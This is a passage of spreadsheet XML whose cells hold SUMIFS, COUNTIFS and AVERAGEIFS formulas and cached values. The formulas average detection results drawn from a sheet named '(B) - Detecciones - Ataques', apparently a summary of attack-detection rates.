        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3470256524</v>
      </c>
      <c r="AA150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.4711538462</v>
      </c>
      <c r="AB150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AD150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE150" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF150" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EW$3:$EW$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG150" s="271"/>
      <c r="AH150" s="352" t="s">
        <v>2572</v>
      </c>
      <c r="AI150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3552631579</v>
      </c>
      <c r="AR150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY150" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB150" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA150" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC150" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH150" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI150" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ150" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK150" s="271"/>
    </row>
    <row r="151">
      <c r="J151" s="277"/>
      <c r="K151" s="512"/>
      <c r="L151" s="512"/>
      <c r="M151" s="512"/>
      <c r="N151" s="512"/>
      <c r="O151" s="278"/>
      <c r="Q151" s="271"/>
      <c r="R151" s="352" t="s">
        <v>2573</v>
      </c>
      <c r="S151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3351941748</v>
      </c>
      <c r="T151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.4828947368</v>
      </c>
      <c r="V151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W151" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3471070467</v>
      </c>
      <c r="AA151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.6153846154</v>
      </c>
      <c r="AB151" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GM$3:$GM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC151" s="501">
        <f>(
    SUMIFS(
